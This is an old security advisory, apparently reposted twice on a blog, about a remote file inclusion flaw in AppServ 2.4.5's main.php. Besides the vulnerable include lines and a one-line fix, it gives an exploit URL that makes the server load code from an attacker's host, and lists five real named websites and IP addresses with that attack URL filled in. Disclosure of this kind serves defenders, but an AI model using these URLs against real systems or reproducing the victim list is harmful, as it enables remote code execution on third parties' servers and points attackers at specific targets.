======================================================================
Remote file include in appserv 2.4.5 (possible in previous versions)
======================================================================
[ What is Appserv ]
AppServ is the Apache/PHP/MySQL open source software installer packages.
Objective : - Easy to buid Webserver and Database Server
- For those who just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that is easily to be ported to other platforms such as WindowZ
- Single step installation , no need to perform multiple step, time consuming installation and configuration.
- Ready-to-run just after you've finished installing.ready-to-run just after you've finished installing.
- If you hate and boring M$ IIS Webserver.
======================================================================
[ The bug ]
This in the directory appserv, file main.php:
======================================================================
include("$appserv_root/lang-english.php");
And another inclusion ( include("$appserv_root/lang-thai.php"); ), but with the same variable
======================================================================
[ Exploit ]
http://[target]/appserv/main.php?appserv_root=http://[attacker]/
======================================================================
[ Real examples ]
http://www.jr.ac.th/appserv/main.php?appserv_root=http://[attacker]/
http://140.116.83.224/appserv/main.php?appserv_root=http://[attacker]/
http://mail2.ttes.tcc.edu.tw/www2/appserv/main.php?appserv_root=http://[attacker]/
http://163.21.245.171/appserv/main.php?appserv_root=http://[attacker]/
http://trainer.ma.cx/appserv/main.php?appserv_root=http://[attacker]/
======================================================================
[ Fix ]
Eliminate the directory appserv (it does not have any utility)
======================================================================
Author: Xez
Contact: Xez.1337@gmail.com
Appserv website: www.appservnetwork.com
======================================================================
출처 : http://securityvulns.com/
Remote file include in appserv 2.4.5 (possible in previous versions)
======================================================================
[ What is Appserv ]
AppServ is the Apache/PHP/MySQL open source software installer packages.
Objective : - Easy to buid Webserver and Database Server
- For those who just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that is easily to be ported to other platforms such as WindowZ
- Single step installation , no need to perform multiple step, time consuming installation and configuration.
- Ready-to-run just after you've finished installing.ready-to-run just after you've finished installing.
- If you hate and boring M$ IIS Webserver.
======================================================================
[ The bug ]
This in the directory appserv, file main.php:
======================================================================
include("$appserv_root/lang-english.php");
And another inclusion ( include("$appserv_root/lang-thai.php"); ), but with the same variable
======================================================================
[ Exploit ]
http://[target]/appserv/main.php?appserv_root=http://[attacker]/
======================================================================
[ Real examples ]
http://www.jr.ac.th/appserv/main.php?appserv_root=http://[attacker]/
http://140.116.83.224/appserv/main.php?appserv_root=http://[attacker]/
http://mail2.ttes.tcc.edu.tw/www2/appserv/main.php?appserv_root=http://[attacker]/
http://163.21.245.171/appserv/main.php?appserv_root=http://[attacker]/
http://trainer.ma.cx/appserv/main.php?appserv_root=http://[attacker]/
======================================================================
[ Fix ]
Eliminate the directory appserv (it does not have any utility)
======================================================================
Author: Xez
Contact: Xez.1337@gmail.com
Appserv website: www.appservnetwork.com
======================================================================
출처 : http://securityvulns.com/
728x90
댓글